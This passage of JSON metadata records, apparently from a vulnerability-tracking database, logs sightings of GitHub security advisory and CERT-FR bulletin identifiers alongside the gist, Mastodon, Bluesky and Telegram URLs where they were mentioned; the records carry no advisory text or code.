"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "4a0ea784-ffb7-49ca-b46f-f17b5e4b9bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/7caa1bd78e60ab31ee0b262088ef29de", "content": "", "creation_timestamp": "2025-07-16T07:02:53.000000Z"}, {"uuid": "8199a87b-8498-4fa7-ba99-0e9a90b83fdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/4d8934e6cf0074e19751c9f27c35add4", "content": "", "creation_timestamp": "2025-07-16T10:08:58.000000Z"}, {"uuid": "0a52a635-a7e9-483d-b90f-c83808aaf66c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/4d8934e6cf0074e19751c9f27c35add4", "content": "", "creation_timestamp": "2025-07-16T10:08:58.000000Z"}, {"uuid": "c5840556-f929-42ff-896f-8439f0129bae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/4f0365a5003239f65288d5f184de3512", "content": "", "creation_timestamp": "2025-07-16T12:02:49.000000Z"}, {"uuid": "106c5d73-0ab9-4f63-9840-d3d52d7f353a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/98ce7a0666262d84439a12e54e494317", "content": "", "creation_timestamp": "2025-07-16T07:08:32.000000Z"}, {"uuid": "2ed5347a-aecf-4c8e-8b24-d837dfdc9a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/4d8934e6cf0074e19751c9f27c35add4", "content": "", "creation_timestamp": "2025-07-16T10:08:58.000000Z"}, {"uuid": "1fcf5b65-2e2d-4dcf-85f4-04aab952558b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/4d8934e6cf0074e19751c9f27c35add4", "content": "", "creation_timestamp": "2025-07-16T10:08:58.000000Z"}, {"uuid": "fd544ec3-b3c9-47d4-a1ac-83d7fca30f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9298-4CF8-G4WJ", "type": "seen", "source": "https://t.me/brutsecurity/1052", "content": "", "creation_timestamp": "2026-07-10T00:00:35.961690Z"}, {"uuid": "0ca965ae-dceb-4245-b43b-7d95bbbc28c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-025", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lrs2l2i5hk2f", "content": "", "creation_timestamp": "2025-06-17T08:16:45.200451Z"}, {"uuid": "3030109d-8cf0-456d-b55f-bdbe772463c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/ad429b69441399ba5cd9ea5a401a6fa4", "content": "", "creation_timestamp": "2025-07-16T07:12:58.000000Z"}, {"uuid": "8320b91c-3f44-414b-b252-c8b3d0d96de3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/4d8934e6cf0074e19751c9f27c35add4", "content": "", "creation_timestamp": "2025-07-16T10:08:58.000000Z"}, {"uuid": "b3e1a316-9c47-4971-83a6-d7b4c6a77973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/safer-bot/4f0365a5003239f65288d5f184de3512", "content": "", "creation_timestamp": "2025-07-16T12:02:49.000000Z"}, {"uuid": "68980620-98ea-4d49-bf39-7bdd97018a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-025", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114697712697106433", "content": "", "creation_timestamp": "2025-06-17T08:16:47.766874Z"}, {"uuid": "62573892-3b46-4c3d-a9b3-67627fa77bcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GV7V-RGG6-548H", "type": "seen", "source": "https://t.me/brutsecurity/1117", "content": "", "creation_timestamp": "2026-07-10T00:00:35.908210Z"}, {"uuid": "aff0dc60-87d7-48ee-8e75-5c6dc71960e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93hx-v9pv-qrm4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114859009211207817", "content": "", "creation_timestamp": "2025-07-15T19:56:34.296168Z"}, {"uuid": "7c9d3c12-f477-42ca-a743-e5ed399696dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0cf217a6edbe879cac1591830d661f3b", "content": "", "creation_timestamp": "2025-07-16T07:16:25.000000Z"}, {"uuid": "e2c1dd91-9ef9-409b-9d0e-47f5fb20d22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/4f0365a5003239f65288d5f184de3512", "content": "", "creation_timestamp": "2025-07-16T12:02:49.000000Z"}, {"uuid": "cef891b2-b1cc-4c59-aa87-1af471f1bfc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/4f0365a5003239f65288d5f184de3512", "content": "", "creation_timestamp": "2025-07-16T12:02:49.000000Z"}, {"uuid": "0fda4f33-c843-4061-b32d-7a6db5e437c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "bdb147ac-2f80-46ce-84ba-aa2afe5c6802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "69e89bb3-6059-4a20-9d96-000ef7b74406", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/5e13e76a11d80f2378b1b43029c98dfc", "content": "", "creation_timestamp": "2025-07-16T07:18:43.000000Z"}, {"uuid": "aa8be008-c2e8-46a6-9644-0eca4d5a514a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h9w6-f932-gq62", "type": "seen", "source": "https://gist.github.com/Prithpal-Sooriya/9fc316e03a337831f357a3e58aa87524", "content": "", "creation_timestamp": "2025-05-19T21:28:23.000000Z"}, {"uuid": "90b151b8-b99e-4df6-a30c-143e684d2b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r2x-8pq8-9489", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114775953190071346", "content": "", "creation_timestamp": "2025-07-01T03:54:19.861615Z"}, {"uuid": "096feb1b-3629-48d3-a2e0-f910ab62b505", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "680b9035-628d-42bc-92c9-95625d52db1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "15fbe9ce-275d-4e47-aa3d-135f3a0d92f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "d56fd08d-84c8-427b-9a8c-cb4fb769c1d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "0614345f-6def-40f0-b1bd-8ae707f0a0a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "6b865ec5-419f-4731-b432-4fc8ff529e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "d339dc0c-1ae6-4f63-8b9b-d00498978807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmfg-rjjm-rjrj", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "96dfdc5d-997e-4b59-a973-c68fa88e5575", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "c992003b-8446-4860-b55c-973085439fee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2hj5-g64g-fp6p", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lqcseht7mw2l", "content": "", "creation_timestamp": "2025-05-29T13:14:47.113687Z"}, {"uuid": "64d9e04b-98b7-40e2-b358-0457e47b0c0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f65-56v6-gxw7", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lscrna4gkf2p", "content": "", "creation_timestamp": "2025-06-23T23:52:10.081651Z"}, {"uuid": "95ef4990-226b-4d6a-8287-ffdf52763ebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-39hj-fxvw-758m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114775957721289224", "content": "", "creation_timestamp": "2025-07-01T03:55:28.867627Z"}, {"uuid": "262c21ac-1276-4115-a978-9766e292fa44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/97cade2cef616b44f78d440689ebfa5f", "content": "", "creation_timestamp": "2025-07-16T07:26:15.000000Z"}, {"uuid": "32ab8ebd-bf8c-46fa-b0f1-75586b497e0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/44091b266acb4014c4ccf5dc4430300a", "content": "", "creation_timestamp": "2025-07-16T07:27:47.000000Z"}, {"uuid": "49c80955-46b6-4e61-a13f-81be185aaa94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/44091b266acb4014c4ccf5dc4430300a", "content": "", "creation_timestamp": "2025-07-16T07:27:47.000000Z"}, {"uuid": "e6478979-4ed9-4d7b-890a-9b5b587d2ec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "69c31337-5273-460c-b86a-b236c0016a64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "beae81ed-a168-4fd5-b3dc-1f875701e69e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "c201e2e3-b4c6-49c1-9360-345078132057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "3fe22019-0221-4bc6-90bc-09db025fb4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/97d935c317385e026121b4d318d8c4ed", "content": "", "creation_timestamp": "2025-07-16T07:30:33.000000Z"}, {"uuid": "148a5eea-5f3e-4443-9b12-a2d776e8480e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-016", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lnfqpv7ddz2i", "content": "", "creation_timestamp": "2025-04-22T13:07:46.642439Z"}, {"uuid": "10930836-0343-47b8-829b-f909f7862747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-016", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114381767667035455", "content": "", "creation_timestamp": "2025-04-22T13:07:49.883012Z"}, {"uuid": "96da1ce5-6df5-402d-b6f7-f1046c309023", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-016", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lng67rjjzc2v", "content": "", "creation_timestamp": "2025-04-22T17:09:18.265851Z"}, {"uuid": "538783e2-c100-4702-b949-ba250d0fbfde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3w94-vq2x-v5wr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114784677315441755", "content": "", "creation_timestamp": "2025-07-02T16:52:59.348079Z"}, {"uuid": "7e9506e7-d4d4-4710-9b58-abaa8301ac14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/83d91599672399ce0def1e7af790f1b1", "content": "", "creation_timestamp": "2025-07-16T07:30:01.000000Z"}, {"uuid": "afee5ab8-1388-4d6d-b041-36e8ccfe4d89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "6dbe1849-5f09-48c3-96ba-fa22290a0611", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7vcf-f5v9-3wr6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114581010099043902", "content": "", "creation_timestamp": "2025-05-27T17:37:44.215695Z"}, {"uuid": "e906a0ba-63c8-4868-b198-46709d2e0436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/7051e2e79479f54d580f488772856057", "content": "", "creation_timestamp": "2025-07-16T07:31:56.000000Z"}, {"uuid": "71d9556a-c97d-4a34-b3f8-bc2050b4b7e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/7051e2e79479f54d580f488772856057", "content": "", "creation_timestamp": "2025-07-16T07:31:56.000000Z"}, {"uuid": "3c2ce423-403f-43cc-8610-926ca2bb8700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/7051e2e79479f54d580f488772856057", "content": "", "creation_timestamp": "2025-07-16T07:31:56.000000Z"}, {"uuid": "f77aecb9-bc6c-4ef7-89a8-a49f30657f68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/7051e2e79479f54d580f488772856057", "content": "", "creation_timestamp": "2025-07-16T07:31:56.000000Z"}, {"uuid": "6404d96d-6eec-4472-b064-7e8ec2ed2497", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/b2e1dad03eb128ff7f5aa2a1bd9c0093", "content": "", "creation_timestamp": "2025-07-16T12:08:01.000000Z"}, {"uuid": "f4a8fe74-c504-40ed-b49a-f901fdfe771b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/538549a0eec3ba102001037f37f37abf", "content": "", "creation_timestamp": "2025-06-17T11:01:06.000000Z"}, {"uuid": "eeac7627-9871-47e1-8556-63ea0bb212ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/538549a0eec3ba102001037f37f37abf", "content": "", "creation_timestamp": "2025-06-17T11:01:06.000000Z"}, {"uuid": "2931159c-ce13-43d2-aa2b-5ffd24a88c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2v9p-3p3h-w56j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114705314960908620", "content": "", "creation_timestamp": "2025-06-18T16:30:06.018419Z"}, {"uuid": "d4050d7d-5294-4e75-9326-d178cfc0d95f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e7c32391174c1d9251586f5bf30d2d31", "content": "", "creation_timestamp": "2025-07-16T07:32:25.000000Z"}, {"uuid": "e7d09f4a-6f50-4b86-8c48-75155ed834cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/b2e1dad03eb128ff7f5aa2a1bd9c0093", "content": "", "creation_timestamp": "2025-07-16T12:08:01.000000Z"}, {"uuid": "926b4604-4949-4ed1-8f12-bee6e53f5c08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/a6a001f7214509ff3dce2d7eb077b5f0", "content": "", "creation_timestamp": "2025-07-16T13:19:23.000000Z"}, {"uuid": "ac2d9d1e-177d-4a1d-b77b-e4a877989af2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6m38-4r9r-5c4m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114705314960908620", "content": "", "creation_timestamp": "2025-06-18T16:30:06.219029Z"}, {"uuid": "64c3d585-c50b-4ba0-ad7b-71508bd3b81d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gq7v-jr8c-mfr7", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-ce9dc8de-9dd00f607efabe37", "content": "", "creation_timestamp": "2025-06-20T14:13:16.022369Z"}, {"uuid": "40e8f0df-42b3-449a-b706-13422871b5f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/f4586a8459eb71b7e28b34f1798ab245", "content": "", "creation_timestamp": "2025-07-16T07:35:44.000000Z"}, {"uuid": "a07e6b57-4ff2-4339-9cc1-cb79fac3a698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/f4586a8459eb71b7e28b34f1798ab245", "content": "", "creation_timestamp": "2025-07-16T07:35:44.000000Z"}, {"uuid": "b5691337-2428-48be-8bbd-4fbf919699ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/f4586a8459eb71b7e28b34f1798ab245", "content": "", "creation_timestamp": "2025-07-16T07:35:44.000000Z"}, {"uuid": "583d5e8b-bf04-48d6-beb0-e3f3456905e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/f4586a8459eb71b7e28b34f1798ab245", "content": "", "creation_timestamp": "2025-07-16T07:35:44.000000Z"}, {"uuid": "c2fb6944-7fbf-43b0-8fa9-b1e16655e376", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r2fw-9cw4-mj86", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114859287202602004", "content": "", "creation_timestamp": "2025-07-15T21:07:16.114281Z"}, {"uuid": "d3d7ecd1-0109-494a-a97d-48167b608c02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/f4586a8459eb71b7e28b34f1798ab245", "content": "", "creation_timestamp": "2025-07-16T07:35:44.000000Z"}, {"uuid": "a4467b3d-acdf-4926-91c0-a8810bf0cdb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-017", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114387910771489498", "content": "", "creation_timestamp": "2025-04-23T15:10:04.197697Z"}, {"uuid": "09aba5ba-8e29-4eea-961b-8304b9b25919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-017", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lnihzgu3ql24", "content": "", "creation_timestamp": "2025-04-23T15:10:05.825063Z"}, {"uuid": "1f00cff4-3906-4ea9-9c27-7c45e88ddc95", "vulnerability_lookup_origin": 